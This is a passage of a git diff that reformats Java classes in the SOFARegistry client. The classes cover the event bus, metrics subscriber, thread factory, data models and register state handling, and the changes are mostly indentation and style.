- .getLogger(DefaultEventBus.class); + /** LOGGER */ + private static final Logger LOGGER = LoggerFactory.getLogger(DefaultEventBus.class); - private RegistryClientConfig config; + private RegistryClientConfig config; - private ConcurrentMap, CopyOnWriteArraySet> eventSubscriberMap = new ConcurrentHashMap, CopyOnWriteArraySet>(); + private ConcurrentMap, CopyOnWriteArraySet> + eventSubscriberMap = + new ConcurrentHashMap, CopyOnWriteArraySet>(); - private Executor executor; + private Executor executor; - /** - * Instantiates a new Default event bus. - * - * @param config the config - */ - public DefaultEventBus(RegistryClientConfig config) { - this.config = config; - this.executor = new ThreadPoolExecutor(config.getObserverThreadCoreSize(), - config.getObserverThreadMaxSize(), 0, TimeUnit.SECONDS, + /** + * Instantiates a new Default event bus. + * + * @param config the config + */ + public DefaultEventBus(RegistryClientConfig config) { + this.config = config; + this.executor = + new ThreadPoolExecutor( + config.getObserverThreadCoreSize(), + config.getObserverThreadMaxSize(), + 0, + TimeUnit.SECONDS, new LinkedBlockingDeque(config.getObserverThreadQueueLength()), new NamedThreadFactory("DefaultEventBusThread")); - } + } - /** - * @see EventBus#register(Class, EventSubscriber) - */ - @Override - public void register(Class eventClass, EventSubscriber eventSubscriber) { - CopyOnWriteArraySet set = eventSubscriberMap.get(eventClass); - if (set == null) { - set = new CopyOnWriteArraySet(); - CopyOnWriteArraySet old = eventSubscriberMap.putIfAbsent(eventClass, - set); - if (old != null) { - set = old; - } - } - set.add(eventSubscriber); - LOGGER.debug("Register subscriber: {} of event: {}.", eventSubscriber, eventClass); + /** @see EventBus#register(Class, EventSubscriber) */ + @Override + public void register(Class eventClass, EventSubscriber eventSubscriber) { + CopyOnWriteArraySet set = eventSubscriberMap.get(eventClass); + if (set == null) { + set = new CopyOnWriteArraySet(); + CopyOnWriteArraySet old = eventSubscriberMap.putIfAbsent(eventClass, set); + if (old != null) { + set = old; + } } + set.add(eventSubscriber); + LOGGER.debug("Register subscriber: {} of event: {}.", eventSubscriber, eventClass); + } - /** - * @see EventBus#unRegister(Class, EventSubscriber) - */ - @Override - public void unRegister(Class eventClass, EventSubscriber eventSubscriber) { - CopyOnWriteArraySet set = eventSubscriberMap.get(eventClass); - if (set != null) { - set.remove(eventSubscriber); - LOGGER.debug("UnRegister subscriber: {} of event: {}.", eventSubscriber, eventClass); - } + /** @see EventBus#unRegister(Class, EventSubscriber) */ + @Override + public void unRegister(Class eventClass, EventSubscriber eventSubscriber) { + CopyOnWriteArraySet set = eventSubscriberMap.get(eventClass); + if (set != null) { + set.remove(eventSubscriber); + LOGGER.debug("UnRegister subscriber: {} of event: {}.", eventSubscriber, eventClass); } + } - /** - * Post. - * - * @param event the event - */ - @Override - public void post(final Event event) { - if (!isEnable()) { - return; - } - CopyOnWriteArraySet subscribers = eventSubscriberMap.get(event.getClass()); - if (null != subscribers && !subscribers.isEmpty()) { - for (final EventSubscriber subscriber : subscribers) { - if (subscriber.isSync()) { - handleEvent(subscriber, event); - } else { // 异步 - executor.execute(new Runnable() { - @Override - public void run() { - handleEvent(subscriber, event); - } - }); + /** + * Post. + * + * @param event the event + */ + @Override + public void post(final Event event) { + if (!isEnable()) { + return; + } + CopyOnWriteArraySet subscribers = eventSubscriberMap.get(event.getClass()); + if (null != subscribers && !subscribers.isEmpty()) { + for (final EventSubscriber subscriber : subscribers) { + if (subscriber.isSync()) { + handleEvent(subscriber, event); + } else { // 异步 + executor.execute( + new Runnable() { + @Override + public void run() { + handleEvent(subscriber, event); } - } + }); } + } } + } - /** - * Is enable boolean. - * - * @return the boolean - */ - @Override - public boolean isEnable() { - return null != config && config.isEventBusEnable(); - } + /** + * Is enable boolean. + * + * @return the boolean + */ + @Override + public boolean isEnable() { + return null != config && config.isEventBusEnable(); + } - /** - * Is enable boolean. - * - * @param eventClass the event class - * @return the boolean - */ - @Override - public boolean isEnable(Class eventClass) { - return isEnable() && CommonUtils.isNotEmpty(eventSubscriberMap.get(eventClass)); - } + /** + * Is enable boolean. + * + * @param eventClass the event class + * @return the boolean + */ + @Override + public boolean isEnable(Class eventClass) { + return isEnable() && CommonUtils.isNotEmpty(eventSubscriberMap.get(eventClass)); + } - private void handleEvent(final EventSubscriber subscriber, final Event event) { - try { - subscriber.onEvent(event); - } catch (Throwable e) { - LOGGER.warn("Handle {} error", event.getClass(), e); - } + private void handleEvent(final EventSubscriber subscriber, final Event event) { + try { + subscriber.onEvent(event); + } catch (Throwable e) { + LOGGER.warn("Handle {} error", event.getClass(), e); } + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/event/LookoutSubscriber.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/event/LookoutSubscriber.java index 6bb6fcc62..cc7fb79f8 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/event/LookoutSubscriber.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/event/LookoutSubscriber.java @@ -25,106 +25,104 @@ import com.alipay.sofa.registry.client.api.Subscriber; import com.alipay.sofa.registry.client.api.model.Event; import com.alipay.sofa.registry.client.util.StringUtils; - import java.util.concurrent.TimeUnit; /** - * * @author zhuoyu.sjw * @version $Id: LookoutSubscriber.java, v 0.1 2018-07-13 20:31 zhuoyu.sjw Exp $$ */ public class LookoutSubscriber implements EventSubscriber { - /** */ - private static final String METRIC_DATA_ID_NAME = "data_id"; + /** */ + private static final String METRIC_DATA_ID_NAME = "data_id"; - /** */ - private static final String METRIC_INSTANCE_ID_NAME = "instance_id"; + /** */ + private static final String METRIC_INSTANCE_ID_NAME = "instance_id"; - /** */ - private static final String METRIC_COUNT_NAME = "count"; + /** */ + private static final String METRIC_COUNT_NAME = "count"; - /** */ - private static final String METRIC_TIME_NAME = "time"; + /** */ + private static final String METRIC_TIME_NAME = "time"; - /** */ - private static final String METRIC_SUCCESS_NAME = "success"; + /** */ + private static final String METRIC_SUCCESS_NAME = "success"; - /** */ - private static final String REGISTRY_PROCESS_SUBSCRIBER = "registry.process.subscriber"; + /** */ + private static final String REGISTRY_PROCESS_SUBSCRIBER = "registry.process.subscriber"; - /** */ - private static final String REGISTRY_PROCESS_CONFIGURATOR = "registry.process.configurator"; + /** */ + private static final String REGISTRY_PROCESS_CONFIGURATOR = "registry.process.configurator"; - /** - * @see EventSubscriber#isSync() - */ - @Override - public boolean isSync() { - return false; - } + /** @see EventSubscriber#isSync() */ + @Override + public boolean isSync() { + return false; + } - /** - * @see EventSubscriber#onEvent(Event) - */ - @Override - public void onEvent(Event event) { - if (null == event) { - return; - } - Class eventClass = event.getClass(); - - if (eventClass == SubscriberProcessEvent.class) { - SubscriberProcessEvent subscriberProcessEvent = (SubscriberProcessEvent) event; - Subscriber subscriber = subscriberProcessEvent.getSubscriber(); - if (null == subscriber) { - return; - } - - RegistryClientConfig config = subscriberProcessEvent.getConfig(); - if (null == config) { - return; - } - - Id id = Lookout - .registry() - .createId(REGISTRY_PROCESS_SUBSCRIBER) - .withTag(METRIC_DATA_ID_NAME, StringUtils.defaultString(subscriber.getDataId())) - .withTag(METRIC_INSTANCE_ID_NAME, StringUtils.defaultString(config.getInstanceId())); - MixinMetric mixin = Lookout.registry().mixinMetric(id); - - mixin.counter(METRIC_COUNT_NAME).inc(); - mixin.timer(METRIC_TIME_NAME).record( - subscriberProcessEvent.getEnd() - subscriberProcessEvent.getStart(), - TimeUnit.MILLISECONDS); - - if (null == subscriberProcessEvent.getThrowable()) { - mixin.counter(METRIC_SUCCESS_NAME).inc(); - } - } else if (eventClass == ConfiguratorProcessEvent.class) { - ConfiguratorProcessEvent configuratorProcessEvent = (ConfiguratorProcessEvent) event; - Configurator configurator = configuratorProcessEvent.getConfigurator(); - if (null == configurator) { - return; - } - - RegistryClientConfig config = configuratorProcessEvent.getConfig(); - - Id id = Lookout - .registry() - .createId(REGISTRY_PROCESS_CONFIGURATOR) - .withTag(METRIC_DATA_ID_NAME, StringUtils.defaultString(configurator.getDataId())) - .withTag(METRIC_INSTANCE_ID_NAME, StringUtils.defaultString(config.getInstanceId())); - MixinMetric mixin = Lookout.registry().mixinMetric(id); - - mixin.counter(METRIC_COUNT_NAME).inc(); - mixin.timer(METRIC_TIME_NAME).record( - configuratorProcessEvent.getEnd() - configuratorProcessEvent.getStart(), - TimeUnit.MILLISECONDS); - - if (null == configuratorProcessEvent.getThrowable()) { - mixin.counter(METRIC_SUCCESS_NAME).inc(); - } - } + /** @see EventSubscriber#onEvent(Event) */ + @Override + public void onEvent(Event event) { + if (null == event) { + return; + } + Class eventClass = event.getClass(); + + if (eventClass == SubscriberProcessEvent.class) { + SubscriberProcessEvent subscriberProcessEvent = (SubscriberProcessEvent) event; + Subscriber subscriber = subscriberProcessEvent.getSubscriber(); + if (null == subscriber) { + return; + } + + RegistryClientConfig config = subscriberProcessEvent.getConfig(); + if (null == config) { + return; + } + + Id id = + Lookout.registry() + .createId(REGISTRY_PROCESS_SUBSCRIBER) + .withTag(METRIC_DATA_ID_NAME, StringUtils.defaultString(subscriber.getDataId())) + .withTag(METRIC_INSTANCE_ID_NAME, StringUtils.defaultString(config.getInstanceId())); + MixinMetric mixin = Lookout.registry().mixinMetric(id); + + mixin.counter(METRIC_COUNT_NAME).inc(); + mixin + .timer(METRIC_TIME_NAME) + .record( + subscriberProcessEvent.getEnd() - subscriberProcessEvent.getStart(), + TimeUnit.MILLISECONDS); + + if (null == subscriberProcessEvent.getThrowable()) { + mixin.counter(METRIC_SUCCESS_NAME).inc(); + } + } else if (eventClass == ConfiguratorProcessEvent.class) { + ConfiguratorProcessEvent configuratorProcessEvent = (ConfiguratorProcessEvent) event; + Configurator configurator = configuratorProcessEvent.getConfigurator(); + if (null == configurator) { + return; + } + + RegistryClientConfig config = configuratorProcessEvent.getConfig(); + + Id id = + Lookout.registry() + .createId(REGISTRY_PROCESS_CONFIGURATOR) + .withTag(METRIC_DATA_ID_NAME, StringUtils.defaultString(configurator.getDataId())) + .withTag(METRIC_INSTANCE_ID_NAME, StringUtils.defaultString(config.getInstanceId())); + MixinMetric mixin = Lookout.registry().mixinMetric(id); + + mixin.counter(METRIC_COUNT_NAME).inc(); + mixin + .timer(METRIC_TIME_NAME) + .record( + configuratorProcessEvent.getEnd() - configuratorProcessEvent.getStart(), + TimeUnit.MILLISECONDS); + + if (null == configuratorProcessEvent.getThrowable()) { + mixin.counter(METRIC_SUCCESS_NAME).inc(); + } } + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/event/SubscriberProcessEvent.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/event/SubscriberProcessEvent.java index d8c6b2a2b..aa723e8c4 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/event/SubscriberProcessEvent.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/event/SubscriberProcessEvent.java @@ -22,117 +22,124 @@ /** * The type Subscriber process event. + * * @author zhuoyu.sjw * @version $Id : SubscriberProcessEvent.java, v 0.1 2018-07-13 18:40 zhuoyu.sjw Exp $$ */ public class SubscriberProcessEvent implements Event { - private Subscriber subscriber; - - private RegistryClientConfig config; - - private long start; - - private long end; - - private Throwable throwable; - - /** - * Getter method for property subscriber. - * - * @return property value of subscriber - */ - public Subscriber getSubscriber() { - return subscriber; - } - - /** - * Setter method for property subscriber. - * - * @param subscriber value to be assigned to property subscriber - */ - public void setSubscriber(Subscriber subscriber) { - this.subscriber = subscriber; - } - - /** - * Getter method for property config. - * - * @return property value of config - */ - public RegistryClientConfig getConfig() { - return config; - } - - /** - * Setter method for property config. - * - * @param config value to be assigned to property config - */ - public void setConfig(RegistryClientConfig config) { - this.config = config; - } - - /** - * Getter method for property start. - * - * @return property value of start - */ - public long getStart() { - return start; - } - - /** - * Setter method for property start. - * - * @param start value to be assigned to property start - */ - public void setStart(long start) { - this.start = start; - } - - /** - * Getter method for property end. - * - * @return property value of end - */ - public long getEnd() { - return end; - } - - /** - * Setter method for property end. - * - * @param end value to be assigned to property end - */ - public void setEnd(long end) { - this.end = end; - } - - /** - * Getter method for property throwable. - * - * @return property value of throwable - */ - public Throwable getThrowable() { - return throwable; - } - - /** - * Setter method for property throwable. - * - * @param throwable value to be assigned to property throwable - */ - public void setThrowable(Throwable throwable) { - this.throwable = throwable; - } - - /** - * @see Object#toString() - */ - @Override - public String toString() { - return "SubscriberProcessEvent{" + "subscriber=" + subscriber + ", start=" + start - + ", end=" + end + ", throwable=" + throwable + '}'; - } + private Subscriber subscriber; + + private RegistryClientConfig config; + + private long start; + + private long end; + + private Throwable throwable; + + /** + * Getter method for property subscriber. + * + * @return property value of subscriber + */ + public Subscriber getSubscriber() { + return subscriber; + } + + /** + * Setter method for property subscriber. + * + * @param subscriber value to be assigned to property subscriber + */ + public void setSubscriber(Subscriber subscriber) { + this.subscriber = subscriber; + } + + /** + * Getter method for property config. + * + * @return property value of config + */ + public RegistryClientConfig getConfig() { + return config; + } + + /** + * Setter method for property config. + * + * @param config value to be assigned to property config + */ + public void setConfig(RegistryClientConfig config) { + this.config = config; + } + + /** + * Getter method for property start. + * + * @return property value of start + */ + public long getStart() { + return start; + } + + /** + * Setter method for property start. + * + * @param start value to be assigned to property start + */ + public void setStart(long start) { + this.start = start; + } + + /** + * Getter method for property end. + * + * @return property value of end + */ + public long getEnd() { + return end; + } + + /** + * Setter method for property end. + * + * @param end value to be assigned to property end + */ + public void setEnd(long end) { + this.end = end; + } + + /** + * Getter method for property throwable. + * + * @return property value of throwable + */ + public Throwable getThrowable() { + return throwable; + } + + /** + * Setter method for property throwable. + * + * @param throwable value to be assigned to property throwable + */ + public void setThrowable(Throwable throwable) { + this.throwable = throwable; + } + + /** @see Object#toString() */ + @Override + public String toString() { + return "SubscriberProcessEvent{" + + "subscriber=" + + subscriber + + ", start=" + + start + + ", end=" + + end + + ", throwable=" + + throwable + + '}'; + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/factory/NamedThreadFactory.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/factory/NamedThreadFactory.java index f58a9a312..e221d38b6 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/factory/NamedThreadFactory.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/factory/NamedThreadFactory.java @@ -21,51 +21,52 @@ /** * The type Named thread factory. + * * @author zhuoyu.sjw * @version $Id : NamedThreadFactory.java, v 0.1 2018-03-02 21:23 zhuoyu.sjw Exp $$ */ public class NamedThreadFactory implements ThreadFactory { - private static final AtomicInteger POOL_NUMBER = new AtomicInteger(1); - private final AtomicInteger threadNumber = new AtomicInteger(1); - private final ThreadGroup group; - private final String namePrefix; - private final boolean isDaemon; + private static final AtomicInteger POOL_NUMBER = new AtomicInteger(1); + private final AtomicInteger threadNumber = new AtomicInteger(1); + private final ThreadGroup group; + private final String namePrefix; + private final boolean isDaemon; - /** - * Instantiates a new Named thread factory. - * - * @param name the name - */ - public NamedThreadFactory(String name) { - this(name, false); - } + /** + * Instantiates a new Named thread factory. + * + * @param name the name + */ + public NamedThreadFactory(String name) { + this(name, false); + } - /** - * Instantiates a new Named thread factory. - * - * @param prefix the prefix - * @param daemon the daemon - */ - public NamedThreadFactory(String prefix, boolean daemon) { - SecurityManager s = System.getSecurityManager(); - group = (s != null) ? s.getThreadGroup() : Thread.currentThread().getThreadGroup(); - namePrefix = prefix + "-" + POOL_NUMBER.getAndIncrement() + "-thread-"; - isDaemon = daemon; - } + /** + * Instantiates a new Named thread factory. + * + * @param prefix the prefix + * @param daemon the daemon + */ + public NamedThreadFactory(String prefix, boolean daemon) { + SecurityManager s = System.getSecurityManager(); + group = (s != null) ? s.getThreadGroup() : Thread.currentThread().getThreadGroup(); + namePrefix = prefix + "-" + POOL_NUMBER.getAndIncrement() + "-thread-"; + isDaemon = daemon; + } - /** - * Create a thread. - * - * @see ThreadFactory#newThread(Runnable) - */ - @Override - public Thread newThread(Runnable r) { - Thread t = new Thread(group, r, namePrefix + threadNumber.getAndIncrement(), 0); - t.setDaemon(isDaemon); - if (t.getPriority() != Thread.NORM_PRIORITY) { - t.setPriority(Thread.NORM_PRIORITY); - } - return t; + /** + * Create a thread. + * + * @see ThreadFactory#newThread(Runnable) + */ + @Override + public Thread newThread(Runnable r) { + Thread t = new Thread(group, r, namePrefix + threadNumber.getAndIncrement(), 0); + t.setDaemon(isDaemon); + if (t.getPriority() != Thread.NORM_PRIORITY) { + t.setPriority(Thread.NORM_PRIORITY); } + return t; + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/model/ConfiguratorData.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/model/ConfiguratorData.java index ab3efa0e5..0888a68c6 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/model/ConfiguratorData.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/model/ConfiguratorData.java @@ -17,55 +17,55 @@ package com.alipay.sofa.registry.client.model; import com.alipay.sofa.registry.core.model.DataBox; - import java.io.Serializable; /** * The type Configurator data. + * * @author zhuoyu.sjw * @version $Id : ConfiguratorData.java, v 0.1 2018-04-18 15:17 zhuoyu.sjw Exp $$ */ public class ConfiguratorData implements Serializable { - private static final long serialVersionUID = 3667107975967019132L; + private static final long serialVersionUID = 3667107975967019132L; - private DataBox dataBox; + private DataBox dataBox; - private Long version; + private Long version; - /** - * Getter method for property dataBox. - * - * @return property value of dataBox - */ - public DataBox getDataBox() { - return dataBox; - } + /** + * Getter method for property dataBox. + * + * @return property value of dataBox + */ + public DataBox getDataBox() { + return dataBox; + } - /** - * Setter method for property dataBox. - * - * @param dataBox value to be assigned to property dataBox - */ - public void setDataBox(DataBox dataBox) { - this.dataBox = dataBox; - } + /** + * Setter method for property dataBox. + * + * @param dataBox value to be assigned to property dataBox + */ + public void setDataBox(DataBox dataBox) { + this.dataBox = dataBox; + } - /** - * Getter method for property version. - * - * @return property value of version - */ - public Long getVersion() { - return version; - } + /** + * Getter method for property version. + * + * @return property value of version + */ + public Long getVersion() { + return version; + } - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(Long version) { - this.version = version; - } + /** + * Setter method for property version. + * + * @param version value to be assigned to property version + */ + public void setVersion(Long version) { + this.version = version; + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/model/SegmentData.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/model/SegmentData.java index 7215a42ed..4fb5cb1af 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/model/SegmentData.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/model/SegmentData.java @@ -17,77 +17,75 @@ package com.alipay.sofa.registry.client.model; import com.alipay.sofa.registry.core.model.DataBox; - import java.io.Serializable; import java.util.List; import java.util.Map; /** - * * @author zhuoyu.sjw * @version $Id: SegmentData.java, v 0.1 2018-03-12 22:13 zhuoyu.sjw Exp $$ */ public class SegmentData implements Serializable { - private static final long serialVersionUID = 3066687802211879826L; + private static final long serialVersionUID = 3066687802211879826L; - private String segment; + private String segment; - private Map> data; + private Map> data; - private Long version; + private Long version; - /** - * Getter method for property segment. - * - * @return property value of segment - */ - public String getSegment() { - return segment; - } + /** + * Getter method for property segment. + * + * @return property value of segment + */ + public String getSegment() { + return segment; + } - /** - * Setter method for property segment. - * - * @param segment value to be assigned to property segment - */ - public void setSegment(String segment) { - this.segment = segment; - } + /** + * Setter method for property segment. + * + * @param segment value to be assigned to property segment + */ + public void setSegment(String segment) { + this.segment = segment; + } - /** - * Getter method for property data. - * - * @return property value of data - */ - public Map> getData() { - return data; - } + /** + * Getter method for property data. + * + * @return property value of data + */ + public Map> getData() { + return data; + } - /** - * Setter method for property data. - * - * @param data value to be assigned to property data - */ - public void setData(Map> data) { - this.data = data; - } + /** + * Setter method for property data. + * + * @param data value to be assigned to property data + */ + public void setData(Map> data) { + this.data = data; + } - /** - * Getter method for property version. - * - * @return property value of version - */ - public Long getVersion() { - return version; - } + /** + * Getter method for property version. + * + * @return property value of version + */ + public Long getVersion() { + return version; + } - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(Long version) { - this.version = version; - } + /** + * Setter method for property version. + * + * @param version value to be assigned to property version + */ + public void setVersion(Long version) { + this.version = version; + } } diff --git a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/AbstractInternalRegister.java b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/AbstractInternalRegister.java index 928e1825e..68e87d67a 100644 --- a/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/AbstractInternalRegister.java +++ b/client/impl/src/main/java/com/alipay/sofa/registry/client/provider/AbstractInternalRegister.java @@ -20,7 +20,6 @@ import com.alipay.sofa.registry.client.auth.AuthManager; import com.alipay.sofa.registry.client.constants.VersionConstants; import com.alipay.sofa.registry.core.model.BaseRegister; - import java.util.HashMap; import java.util.Map; import java.util.UUID; @@ -37,371 +36,371 @@ */ public abstract class AbstractInternalRegister implements Register { - /** */ - private final AtomicLong initialVersion = new AtomicLong(VersionConstants.UNINITIALIZED_VERSION); - /** */ - private AuthManager authManager; - /** */ - private volatile boolean registered = false; - /** */ - private volatile boolean enabled = true; - /** */ - private volatile boolean refused = false; - /** */ - private AtomicLong pubVersion = new AtomicLong(VersionConstants.UNINITIALIZED_VERSION); - /** */ - private AtomicLong ackVersion = new AtomicLong(VersionConstants.UNINITIALIZED_VERSION); - /** */ - private volatile long timestamp = System.currentTimeMillis(); - /** */ - private volatile int registerCount = 0; - /** */ - private volatile String requestId = UUID.randomUUID().toString(); - - private ReadWriteLock lock = new ReentrantReadWriteLock(); - - /** - * The Read lock. - */ - protected Lock readLock = lock.readLock(); - - /** - * The Write lock. - */ - protected Lock writeLock = lock.writeLock(); - - /** - * Assembly object. - * - * @return the object - */ - public abstract Object assembly(); - - /** - * Is registered boolean. - * - * @return boolean boolean - */ - @Override - public boolean isRegistered() { - readLock.lock(); - try { - return registered; - } finally { - readLock.unlock(); - } + /** */ + private final AtomicLong initialVersion = new AtomicLong(VersionConstants.UNINITIALIZED_VERSION); + /** */ + private AuthManager authManager; + /** */ + private volatile boolean registered = false; + /** */ + private volatile boolean enabled = true; + /** */ + private volatile boolean refused = false; + /** */ + private AtomicLong pubVersion = new AtomicLong(VersionConstants.UNINITIALIZED_VERSION); + /** */ + private AtomicLong ackVersion = new AtomicLong(VersionConstants.UNINITIALIZED_VERSION); + /** */ + private volatile long timestamp = System.currentTimeMillis(); + /** */ + private volatile int registerCount = 0; + /** */ + private volatile String requestId = UUID.randomUUID().toString(); + + private ReadWriteLock lock = new ReentrantReadWriteLock(); + + /** The Read lock. */ + protected Lock readLock = lock.readLock(); + + /** The Write lock. */ + protected Lock writeLock = lock.writeLock(); + + /** + * Assembly object. + * + * @return the object + */ + public abstract Object assembly(); + + /** + * Is registered boolean. + * + * @return boolean boolean + */ + @Override + public boolean isRegistered() { + readLock.lock(); + try { + return registered; + } finally { + readLock.unlock(); } - - /** - * Wait to sync. - */ - void waitToSync() { - writeLock.lock(); - try { - this.registered = false; - this.requestId = UUID.randomUUID().toString(); - } finally { - writeLock.unlock(); - } + } + + /** Wait to sync. */ + void waitToSync() { + writeLock.lock(); + try { + this.registered = false; + this.requestId = UUID.randomUUID().toString(); + } finally { + writeLock.unlock(); } - - /** - * Sync ok. - * - * @param requestId the request id - * @param version the version - * @param refused the refused - * @return the boolean - */ - public boolean syncOK(String requestId, long version, boolean refused) { - writeLock.lock(); - try { - if (this.requestId.equals(requestId)) { - this.registered = true; - this.refused = refused; - this.setAckVersion(version); - return true; - } - return false; - } finally { - writeLock.unlock(); - } + } + + /** + * Sync ok. + * + * @param requestId the request id + * @param version the version + * @param refused the refused + * @return the boolean + */ + public boolean syncOK(String requestId, long version, boolean refused) { + writeLock.lock(); + try { + if (this.requestId.equals(requestId)) { + this.registered = true; + this.refused = refused; + this.setAckVersion(version); + return true; + } + return false; + } finally { + writeLock.unlock(); } - - /** - * @see Register#isEnabled() - */ - @Override - public boolean isEnabled() { - readLock.lock(); - try { - return enabled; - } finally { - readLock.unlock(); - } + } + + /** @see Register#isEnabled() */ + @Override + public boolean isEnabled() { + readLock.lock(); + try { + return enabled; + } finally { + readLock.unlock(); } - - /** - * Sets enabled. - * - * @param requestId the request id - */ - public void refused(String requestId) { - writeLock.lock(); - try { - if (this.requestId.equals(requestId)) { - this.enabled = false; - this.refused = true; - } - } finally { - writeLock.unlock(); - } + } + + /** + * Sets enabled. + * + * @param requestId the request id + */ + public void refused(String requestId) { + writeLock.lock(); + try { + if (this.requestId.equals(requestId)) { + this.enabled = false; + this.refused = true; + } + } finally { + writeLock.unlock(); } - - /** - * Is done boolean. - * - * @return boolean boolean - */ - public boolean isDone() { - readLock.lock(); - try { - return (this.isRegistered() && this.pubVersion.get() == this.ackVersion.get()) - || this.isRefused(); - } finally { - readLock.unlock(); - } + } + + /** + * Is done boolean. + * + * @return boolean boolean + */ + public boolean isDone() { + readLock.lock(); + try { + return (this.isRegistered() && this.pubVersion.get() == this.ackVersion.get()) + || this.isRefused(); + } finally { + readLock.unlock(); } - - /** - * Assembly sync task sync task. - * - * @return the sync task - */ - public SyncTask assemblySyncTask() { - readLock.lock(); - try { - SyncTask syncTask = new SyncTask(); - syncTask.setRequestId(requestId); - syncTask.setRequest(assembly()); - syncTask.setDone(isDone()); - return syncTask; - } finally { - readLock.unlock(); - } + } + + /** + * Assembly sync task sync task. + * + * @return the sync task + */ + public SyncTask assemblySyncTask() { + readLock.lock(); + try { + SyncTask syncTask = new SyncTask(); + syncTask.setRequestId(requestId); + syncTask.setRequest(assembly()); + syncTask.setDone(isDone()); + return syncTask; + } finally { + readLock.unlock(); } - - /** - * Gets pub version. - * - * @return AtomicLong pub version - */ - public AtomicLong getPubVersion() { - return this.pubVersion; + } + + /** + * Gets pub version. + * + * @return AtomicLong pub version + */ + public AtomicLong getPubVersion() { + return this.pubVersion; + } + + /** + * Sets ack version. + * + * @param version the ack version + */ + public void setAckVersion(Long version) { + if (null == version) { + return; } - /** - * Sets ack version. - * - * @param version the ack version - */ - public void setAckVersion(Long version) { - if (null == version) { - return; - } - - long current = ackVersion.get(); - if (version <= current) { - return; - } - - boolean result = this.ackVersion.compareAndSet(current, version); - if (result) { - return; - } - - setAckVersion(version); + long current = ackVersion.get(); + if (version <= current) { + return; } - /** - * @see Register#reset() - */ - @Override - public void reset() { - writeLock.lock(); - try { - this.registered = false; - this.registerCount = 0; - this.timestamp = System.currentTimeMillis(); - this.ackVersion = new AtomicLong(initialVersion.longValue()); - this.requestId = UUID.randomUUID().toString(); - } finally { - writeLock.unlock(); - } + boolean result = this.ackVersion.compareAndSet(current, version); + if (result) { + return; } - /** - * @see Register#unregister() - */ - @Override - public void unregister() { - writeLock.lock(); - try { - this.enabled = false; - this.pubVersion.incrementAndGet(); - this.requestId = UUID.randomUUID().toString(); - this.registerCount = 0; - } finally { - writeLock.unlock(); - } + setAckVersion(version); + } + + /** @see Register#reset() */ + @Override + public void reset() { + writeLock.lock(); + try { + this.registered = false; + this.registerCount = 0; + this.timestamp = System.currentTimeMillis(); + this.ackVersion = new AtomicLong(initialVersion.longValue()); + this.requestId = UUID.randomUUID().toString(); + } finally { + writeLock.unlock(); } - - /** - * Getter method for property refused. - * - * @return property value of refused - */ - boolean isRefused() { - readLock.lock(); - try { - return refused; - } finally { - readLock.unlock(); - } + } + + /** @see Register#unregister() */ + @Override + public void unregister() { + writeLock.lock(); + try { + this.enabled = false; + this.pubVersion.incrementAndGet(); + this.requestId = UUID.randomUUID().toString(); + this.registerCount = 0; + } finally { + writeLock.unlock(); } + } + + /** + * Getter method for property refused. + * + * @return property value of refused + */ + boolean isRefused() { + readLock.lock(); + try { + return refused; + } finally { + readLock.unlock(); + } + } + + /** + * Getter method for property timestamp. + * + * @return property value of timestamp + */ + @Override + public long getTimestamp() { + readLock.lock(); + try { + return timestamp; + } finally { + readLock.unlock(); + } + } + + /** + * Setter method for property timestamp. + * + * @param timestamp value to be assigned to property timestamp + */ + void setTimestamp(long timestamp) { + writeLock.lock(); + try { + this.timestamp = timestamp; + } finally { + writeLock.unlock(); + } + } + + /** + * Sets auth signature. + * + * @param register the register + */ + void setAuthSignature(BaseRegister register) { + // auth signature + if (null != authManager) { + Map authAttributes = authManager.getAuthContent(register); + + // merge auth attributes with exists register attributes + Map registerAttributes = register.getAttributes(); + if (null == registerAttributes) { + registerAttributes = new HashMap(); + } + registerAttributes.putAll(authAttributes); + register.setAttributes(registerAttributes); + } + } + + /** + * Setter method for property authManager. + * + * @param authManager value to be assigned to property authManager + */ + public void setAuthManager(AuthManager authManager) { + this.authManager = authManager; + } + + /** @see Object#toString() */ + @Override + public String toString() { + return "AbstractInternalRegister{" + + "initialVersion=" + + initialVersion + + ", registered=" + + registered + + ", enabled=" + + enabled + + ", refused=" + + refused + + ", pubVersion=" + + pubVersion + + ", ackVersion=" + + ackVersion + + ", timestamp=" + + timestamp + + ", registerCount=" + + registerCount + + ", requestId='" + + requestId + + '}'; + } + + /** The type Sync task. */ + public static class SyncTask { + + private String requestId; + + private Object request; + + private boolean done; /** - * Getter method for property timestamp. + * Getter method for property requestId. * - * @return property value of timestamp + * @return property value of requestId */ - @Override - public long getTimestamp() { - readLock.lock(); - try { - return timestamp; - } finally { - readLock.unlock(); - } + public String getRequestId() { + return requestId; } /** - * Setter method for property timestamp. + * Setter method for property requestId. * - * @param timestamp value to be assigned to property timestamp + * @param requestId value to be assigned to property requestId */ - void setTimestamp(long timestamp) { - writeLock.lock(); - try { - this.timestamp = timestamp; - } finally { - writeLock.unlock(); - } + void setRequestId(String requestId) { + this.requestId = requestId; } /** - * Sets auth signature. + * Getter method for property request. * - * @param register the register + * @return property value of request */ - void setAuthSignature(BaseRegister register) { - // auth signature - if (null != authManager) { - Map authAttributes = authManager.getAuthContent(register); 